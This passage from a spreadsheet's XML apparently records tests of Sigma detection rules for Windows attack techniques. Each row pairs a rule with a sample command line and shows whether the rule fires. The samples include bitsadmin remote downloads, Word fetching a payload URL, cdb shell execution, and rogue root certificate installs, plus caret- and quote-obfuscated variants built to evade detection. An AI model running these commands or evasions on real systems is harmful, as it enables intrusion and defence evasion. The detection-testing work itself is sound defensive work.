      <c r="C3794" s="44" t="inlineStr">
        <is>
          <t>Suspicious Cabinet File Execution Via Msdt.EXE</t>
        </is>
      </c>
      <c r="D3794" s="44" t="inlineStr">
        <is>
          <t>dc4576d4-7467-424f-9eee-fd2b02855fe0</t>
        </is>
      </c>
      <c r="E3794" s="44" t="inlineStr">
        <is>
          <t>msdt.exe    -cab    C:\Temp\test.cab</t>
        </is>
      </c>
      <c r="F3794" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3794" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3794" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3794" s="44" t="inlineStr">
        <is>
          <t>Suspicious Cabinet File Execution Via Msdt.EXE (dc4576d4-7467-424f-9eee-fd2b02855fe0)</t>
        </is>
      </c>
      <c r="J3794" s="44" t="n"/>
      <c r="K3794" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3795" ht="15.75" customHeight="1" s="42">
      <c r="A3795" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3795" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_arbitrary_cli_download</t>
        </is>
      </c>
      <c r="C3795" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Using Office Application</t>
        </is>
      </c>
      <c r="D3795" s="44" t="inlineStr">
        <is>
          <t>4ae3e30b-b03f-43aa-87e3-b622f4048eed</t>
        </is>
      </c>
      <c r="E3795" s="44" t="inlineStr">
        <is>
          <t>WINWORD.EXE HttPs://example.com/payload.docx</t>
        </is>
      </c>
      <c r="F3795" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3795" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3795" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3795" s="44" t="n"/>
      <c r="J3795" s="44" t="n"/>
      <c r="K3795" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3796" ht="15.75" customHeight="1" s="42">
      <c r="A3796" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3796" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_arbitrary_cli_download</t>
        </is>
      </c>
      <c r="C3796" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Using Office Application</t>
        </is>
      </c>
      <c r="D3796" s="44" t="inlineStr">
        <is>
          <t>4ae3e30b-b03f-43aa-87e3-b622f4048eed</t>
        </is>
      </c>
      <c r="E3796" s="44" t="inlineStr">
        <is>
          <t>WINWORD.EXE "https://example.com/payload.docx"</t>
        </is>
      </c>
      <c r="F3796" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3796" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3796" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3796" s="44" t="n"/>
      <c r="J3796" s="44" t="n"/>
      <c r="K3796" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3797" ht="15.75" customHeight="1" s="42">
      <c r="A3797" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3797" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_no_params</t>
        </is>
      </c>
      <c r="C3797" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without CommandLine Parameters</t>
        </is>
      </c>
      <c r="D3797" s="44" t="inlineStr">
        <is>
          <t>1775e15e-b61b-4d14-a1a3-80981298085a</t>
        </is>
      </c>
      <c r="E3797" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe</t>
        </is>
      </c>
      <c r="F3797" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3797" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3797" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3797" s="44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3797" s="44" t="n"/>
      <c r="K3797" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3798" ht="15.75" customHeight="1" s="42">
      <c r="A3798" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3798" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_no_params</t>
        </is>
      </c>
      <c r="C3798" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without CommandLine Parameters</t>
        </is>
      </c>
      <c r="D3798" s="44" t="inlineStr">
        <is>
          <t>1775e15e-b61b-4d14-a1a3-80981298085a</t>
        </is>
      </c>
      <c r="E3798" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe .\</t>
        </is>
      </c>
      <c r="F3798" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3798" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3798" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3798" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J3798" s="44" t="n"/>
      <c r="K3798" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3799" ht="15.75" customHeight="1" s="42">
      <c r="A3799" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3799" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_no_params</t>
        </is>
      </c>
      <c r="C3799" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without CommandLine Parameters</t>
        </is>
      </c>
      <c r="D3799" s="44" t="inlineStr">
        <is>
          <t>1775e15e-b61b-4d14-a1a3-80981298085a</t>
        </is>
      </c>
      <c r="E3799" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32".exe</t>
        </is>
      </c>
      <c r="F3799" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3799" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3799" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3799" s="44" t="n"/>
      <c r="J3799" s="44" t="n"/>
      <c r="K3799" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3800" ht="15.75" customHeight="1" s="42">
      <c r="A3800" s="44" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B3800" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C3800" s="44" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D3800" s="44" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E3800" s="44" t="inlineStr">
        <is>
          <t>bitsadmin.exe "/Addfile" AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Users\thaim\AppData\Local\Temp\bitsadmin3_flag.ps1</t>
        </is>
      </c>
      <c r="F3800" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3800" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3800" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3800" s="44" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS (b9cbbc17-d00d-4e3d-a827-b06d03d2380d)</t>
        </is>
      </c>
      <c r="J3800" s="44" t="n"/>
      <c r="K3800" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3801" ht="15.75" customHeight="1" s="42">
      <c r="A3801" s="44" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B3801" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C3801" s="44" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D3801" s="44" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E3801" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c bitsadmin.exe /Ad^dfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Users\thaim\AppData\Local\Temp\bitsadmin3_flag.ps1</t>
        </is>
      </c>
      <c r="F3801" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3801" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3801" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3801" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin (8518ed3d-f7c9-4601-a26c-f361a4256a0c); File With Suspicious Extension Downloaded Via Bitsadmin (5b80a791-ad9b-4b75-bcc1-ad4e1e89c200); File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede); File Download Via Bitsadmin To An Uncommon Target Folder (6e30c82f-a9f8-4aab-b79c-7c12bce6f248); Monitoring For Persistence Via BITS (b9cbbc17-d00d-4e3d-a827-b06d03d2380d)</t>
        </is>
      </c>
      <c r="J3801" s="44" t="n"/>
      <c r="K3801" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3802" ht="15.75" customHeight="1" s="42">
      <c r="A3802" s="44" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B3802" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C3802" s="44" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D3802" s="44" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E3802" s="44" t="inlineStr">
        <is>
          <t>bitsadmin.exe	/Addfile	AtomicBITS	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md	C:\Users\thaim\AppData\Local\Temp\bitsadmin3_flag.ps1</t>
        </is>
      </c>
      <c r="F3802" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3802" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3802" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3802" s="44" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS (b9cbbc17-d00d-4e3d-a827-b06d03d2380d)</t>
        </is>
      </c>
      <c r="J3802" s="44" t="n"/>
      <c r="K3802" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3803" ht="15.75" customHeight="1" s="42">
      <c r="A3803" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B3803" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3803" s="44" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D3803" s="44" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E3803" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe"	-c	".shell cmd /c echo test &gt; C:\Temp\test.txt;q"	notepad.exe</t>
        </is>
      </c>
      <c r="F3803" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3803" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3803" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3803" s="44" t="n"/>
      <c r="J3803" s="44" t="n"/>
      <c r="K3803" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3804" ht="15.75" customHeight="1" s="42">
      <c r="A3804" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3804" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certmgr_certificate_installation</t>
        </is>
      </c>
      <c r="C3804" s="44" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via CertMgr.EXE</t>
        </is>
      </c>
      <c r="D3804" s="44" t="inlineStr">
        <is>
          <t>ff992eac-6449-4c60-8c1d-91c9722a1d48</t>
        </is>
      </c>
      <c r="E3804" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\Windows Kits\10\bin\10.0.26100.0\x64\certmgr.exe" -add C:\Temp\TestRootCA.cer /s /r localMachine root</t>
        </is>
      </c>
      <c r="F3804" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3804" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3804" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3804" s="44" t="n"/>
      <c r="J3804" s="44" t="n"/>
      <c r="K3804" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3805" ht="15.75" customHeight="1" s="42">
      <c r="A3805" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3805" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certmgr_certificate_installation</t>
        </is>
      </c>
      <c r="C3805" s="44" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via CertMgr.EXE</t>
        </is>
      </c>
      <c r="D3805" s="44" t="inlineStr">
        <is>
          <t>ff992eac-6449-4c60-8c1d-91c9722a1d48</t>
        </is>
      </c>
      <c r="E3805" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\Windows Kits\10\bin\10.0.26100.0\x64\certmgr.exe" "/add" C:\Temp\TestRootCA.cer /s /r localMachine root</t>
        </is>
      </c>
      <c r="F3805" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3805" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3805" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3805" s="44" t="n"/>
      <c r="J3805" s="44" t="n"/>
      <c r="K3805" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3806" ht="15.75" customHeight="1" s="42">
      <c r="A3806" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3806" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certmgr_certificate_installation</t>
        </is>
      </c>
      <c r="C3806" s="44" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via CertMgr.EXE</t>
        </is>
      </c>
      <c r="D3806" s="44" t="inlineStr">
        <is>
          <t>ff992eac-6449-4c60-8c1d-91c9722a1d48</t>
        </is>
      </c>
      <c r="E3806" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\Program Files (x86)\Windows Kits\10\bin\10.0.26100.0\x64\certmgr.exe" /a^dd C:\Temp\TestRootCA.cer /s /r localMachine root"</t>
        </is>
      </c>
      <c r="F3806" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3806" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3806" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3806" s="44" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via CertMgr.EXE (ff992eac-6449-4c60-8c1d-91c9722a1d48)</t>
        </is>
      </c>
      <c r="J3806" s="44" t="n"/>
      <c r="K3806" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3807" ht="15.75" customHeight="1" s="42">
      <c r="A3807" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3807" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_certificate_installation</t>
        </is>
      </c>
      <c r="C3807" s="44" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D3807" s="44" t="inlineStr">
        <is>
          <t>d2125259-ddea-4c1c-9c22-977eb5b29cf0</t>
        </is>
      </c>
      <c r="E3807" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32\certutil.exe" /addstore my C:\Users\thaim\AppData\Local\Temp\rootCA2.cer</t>
        </is>
      </c>
      <c r="F3807" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3807" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3807" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3807" s="44" t="n"/>
      <c r="J3807" s="44" t="n"/>
      <c r="K3807" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3808" ht="15.75" customHeight="1" s="42">
      <c r="A3808" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3808" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_certificate_installation</t>
        </is>
      </c>
      <c r="C3808" s="44" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D3808" s="44" t="inlineStr">
        <is>
          <t>d2125259-ddea-4c1c-9c22-977eb5b29cf0</t>
        </is>
      </c>
      <c r="E3808" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32\certutil.exe" "-addstore" my C:\Users\thaim\AppData\Local\Temp\rootCA2.cer</t>
        </is>
      </c>
      <c r="F3808" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3808" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3808" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3808" s="44" t="n"/>
      <c r="J3808" s="44" t="n"/>
      <c r="K3808" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3809" ht="15.75" customHeight="1" s="42">
      <c r="A3809" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3809" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_certificate_installation</t>
        </is>
      </c>
      <c r="C3809" s="44" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D3809" s="44" t="inlineStr">
        <is>
          <t>d2125259-ddea-4c1c-9c22-977eb5b29cf0</t>
        </is>
      </c>
      <c r="E3809" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\WINDOWS\system32\certutil.exe" -add^store my C:\Users\thaim\AppData\Local\Temp\rootCA2.cer"</t>
        </is>
      </c>
      <c r="F3809" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3809" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3809" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3809" s="44" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE (d2125259-ddea-4c1c-9c22-977eb5b29cf0)</t>
        </is>
      </c>
      <c r="J3809" s="44" t="n"/>
      <c r="K3809" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3810" ht="15.75" customHeight="1" s="42">
      <c r="A3810" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3810" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_certificate_installation</t>
        </is>
      </c>
      <c r="C3810" s="44" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D3810" s="44" t="inlineStr">
        <is>
          <t>d2125259-ddea-4c1c-9c22-977eb5b29cf0</t>
        </is>
      </c>
      <c r="E3810" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32\certutil.exe" -addstore my C:\Users\thaim\AppData\Local\Temp\ro""otCA2.cer</t>
        </is>
      </c>
      <c r="F3810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3810" s="44" t="n"/>
      <c r="J3810" s="44" t="n"/>
      <c r="K3810" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3811" ht="15.75" customHeight="1" s="42">
      <c r="A3811" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3811" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_x509enrollment</t>
        </is>
      </c>
      <c r="C3811" s="44" t="inlineStr">
        <is>
          <t>Suspicious X509Enrollment - Process Creation</t>
        </is>
      </c>
      <c r="D3811" s="44" t="inlineStr">
        <is>
          <t>114de787-4eb2-48cc-abdb-c0b449f93ea4</t>
        </is>
      </c>
      <c r="E3811" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "[System.Reflection.Assembly]::LoadWithPartialName('System.Security'); [System.Security.Cryptography.X509Certificates.X509Enrollment.CBinaryConverter]::Create"</t>
        </is>
      </c>
      <c r="F3811" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3811" s="44" t="inlineStr">
        <is>
          <t>Suspicious X509Enrollment - Process Creation (114de787-4eb2-48cc-abdb-c0b449f93ea4); Suspicious X509Enrollment - Process Creation (114de787-4eb2-48cc-abdb-c0b449f93ea4)</t>
        </is>
      </c>
      <c r="J3811" s="44" t="n"/>
      <c r="K3811" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3812" ht="15.75" customHeight="1" s="42">
      <c r="A3812" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3812" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_x509enrollment</t>
        </is>
      </c>
      <c r="C3812" s="44" t="inlineStr">
        <is>
          <t>Suspicious X509Enrollment - Process Creation</t>
        </is>
      </c>
      <c r="D3812" s="44" t="inlineStr">
        <is>
          <t>114de787-4eb2-48cc-abdb-c0b449f93ea4</t>
        </is>
      </c>
      <c r="E3812" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\windowspowershell\v1.0\powershell.exe -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security; [System.Security.Cryptography.X509Certificates.X509Enrollment.CBinaryConverter]::Create()"</t>
        </is>
      </c>
      <c r="F3812" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3812" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180); Suspicious X509Enrollment - Process Creation (114de787-4eb2-48cc-abdb-c0b449f93ea4); Suspicious X509Enrollment - Process Creation (114de787-4eb2-48cc-abdb-c0b449f93ea4)</t>
        </is>
      </c>
      <c r="J3812" s="44" t="n"/>
      <c r="K3812" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3813" ht="15.75" customHeight="1" s="42">
      <c r="A3813" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B3813" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C3813" s="44" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D3813" s="44" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E3813" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\spool\tools\PrintBrm.exe "-f" C:\Temp\backup.zip -b -s LOCAL</t>
        </is>
      </c>
      <c r="F3813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3813" s="44" t="n"/>
      <c r="J3813" s="44" t="n"/>
      <c r="K3813" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3814" ht="15.75" customHeight="1" s="42">
      <c r="A3814" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B3814" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C3814" s="44" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D3814" s="44" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E3814" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c PrintBrm.exe -^f C:\Temp\backup.zip -b -s LOCAL</t>
        </is>
      </c>
      <c r="F3814" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3814" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3814" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3814" s="44" t="n"/>
      <c r="J3814" s="44" t="n"/>
      <c r="K3814" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3815" ht="15.75" customHeight="1" s="42">
      <c r="A3815" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B3815" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C3815" s="44" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D3815" s="44" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E3815" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\spool\tools\PrintBrm.exe\t-f\tC:\Temp\backup.zip\t-b\t-s\tLOCAL</t>
        </is>
      </c>
      <c r="F3815" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3815" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3815" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3815" s="44" t="n"/>
      <c r="J3815" s="44" t="n"/>
      <c r="K3815" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3816" ht="15.75" customHeight="1" s="42">
      <c r="A3816" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B3816" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C3816" s="44" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D3816" s="44" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E3816" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\spool\tools\PrintBrm.exe -f C:\Temp\backup.zip.tmp -b -s LOCAL</t>
        </is>
      </c>
      <c r="F3816" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3816" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3816" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3816" s="44" t="n"/>
      <c r="J3816" s="44" t="n"/>
      <c r="K3816" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3817" ht="15.75" customHeight="1" s="42">
      <c r="A3817" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3817" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C3817" s="44" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D3817" s="44" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E3817" s="44" t="inlineStr">
        <is>
          <t>chcp.com 936</t>
        </is>
      </c>
      <c r="F3817" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3817" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3817" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3817" s="44" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP (c7942406-33dd-4377-a564-0f62db0593a3)</t>
        </is>
      </c>
      <c r="J3817" s="44" t="n"/>
      <c r="K3817" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3818" ht="15.75" customHeight="1" s="42">
      <c r="A3818" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3818" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C3818" s="44" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D3818" s="44" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E3818" s="44" t="inlineStr">
        <is>
          <t>chcp.com 936 &amp; whoami</t>
        </is>
      </c>
      <c r="F3818" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3818" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3818" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3818" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J3818" s="44" t="n"/>
      <c r="K3818" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3819" ht="15.75" customHeight="1" s="42">
      <c r="A3819" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3819" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C3819" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D3819" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
